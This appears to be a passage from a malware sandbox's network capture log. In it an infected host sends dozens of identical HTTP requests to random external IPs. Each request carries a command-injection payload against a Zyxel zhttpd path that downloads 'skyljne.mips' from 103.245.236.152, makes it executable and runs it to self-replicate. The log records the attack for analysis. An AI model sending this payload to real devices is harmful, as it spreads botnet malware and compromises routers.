                                        Jan 14, 2024 16:18:32.159832001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1030192.168.2.1333332168.179.249.84443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.159878016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1031192.168.2.135452490.48.113.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.159955025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1032192.168.2.1353566145.241.200.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.160008907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1033192.168.2.135146299.65.189.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.160056114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1034192.168.2.135691457.202.38.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.160113096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1035192.168.2.1345580126.219.147.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.160173893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1036192.168.2.1333028169.84.192.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.160228968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1037192.168.2.135633467.48.67.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.160290003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1038192.168.2.134261260.66.70.213443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.160346985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1039192.168.2.1343694156.14.103.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.160403967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1040192.168.2.1357740104.23.124.166443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.160439968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1041192.168.2.134472675.169.59.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.160502911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1042192.168.2.1340324158.139.172.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.160572052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1043192.168.2.1342526162.27.86.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.160628080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1044192.168.2.1348970136.255.242.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.160686970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1045192.168.2.134175814.96.46.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.160725117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1046192.168.2.1348898102.50.232.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.160774946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1047192.168.2.135184643.123.198.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.160818100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1048192.168.2.133872432.85.91.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.160878897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1049192.168.2.1344854181.246.12.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.160953999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1050192.168.2.1346116204.139.185.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.161017895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1051192.168.2.1347172112.142.24.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.161072016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1052192.168.2.1340306137.205.235.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.161153078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1053192.168.2.1346934163.239.24.194443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.161200047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1054192.168.2.1333484173.239.148.148443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.161230087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1055192.168.2.135772482.132.135.63443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.161303043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1056192.168.2.135812635.255.68.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.161360979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1057192.168.2.1354700183.175.4.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.161393881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1058192.168.2.1350848168.49.118.106443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.161454916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1059192.168.2.1334594105.187.200.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.161515951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1060192.168.2.135790665.213.161.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.161561966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1061192.168.2.1338576195.208.181.222443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.161623955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1062192.168.2.1346142119.246.59.36443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.161654949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1063192.168.2.1334934105.127.154.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.161716938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1064192.168.2.135734678.59.5.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.161780119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1065192.168.2.1345878198.250.47.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.161815882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1066192.168.2.133722054.102.105.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.161864996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1067192.168.2.1342420116.20.123.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.161925077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1068192.168.2.1354820145.167.231.242443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.161983013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1069192.168.2.134701836.41.221.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.162036896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1070192.168.2.1344238201.66.50.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.162077904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1071192.168.2.135022435.25.65.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.162142992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1072192.168.2.1360206157.47.59.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.162178040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1073192.168.2.1339334169.7.251.228443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.162257910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1074192.168.2.1337208189.26.162.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.162307978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1075192.168.2.1351072198.52.76.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.162368059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1076192.168.2.1352288183.194.74.104443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.162451982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1077192.168.2.1351238142.202.157.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.162472963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1078192.168.2.1336898117.43.70.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.162524939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1079192.168.2.1342516153.11.179.242443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.162564993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1080192.168.2.135001844.2.76.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.162679911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1081192.168.2.135524038.114.210.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.162681103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1082192.168.2.1355076132.63.33.228443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.162709951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1083192.168.2.135645870.45.179.102443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.162775040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1084192.168.2.1338568200.113.31.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.162826061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1085192.168.2.1355322199.250.125.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.162859917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1086192.168.2.134001498.169.243.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.162916899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1087192.168.2.135175817.139.107.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.162980080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1088192.168.2.1354778192.23.226.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.163016081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1089192.168.2.135845083.226.18.51443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.163069010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1090192.168.2.133357063.221.41.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.163150072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1091192.168.2.1358188217.128.51.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.163197994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1092192.168.2.1355220208.32.243.111443
                                        TimestampBytes transferredDirectionData
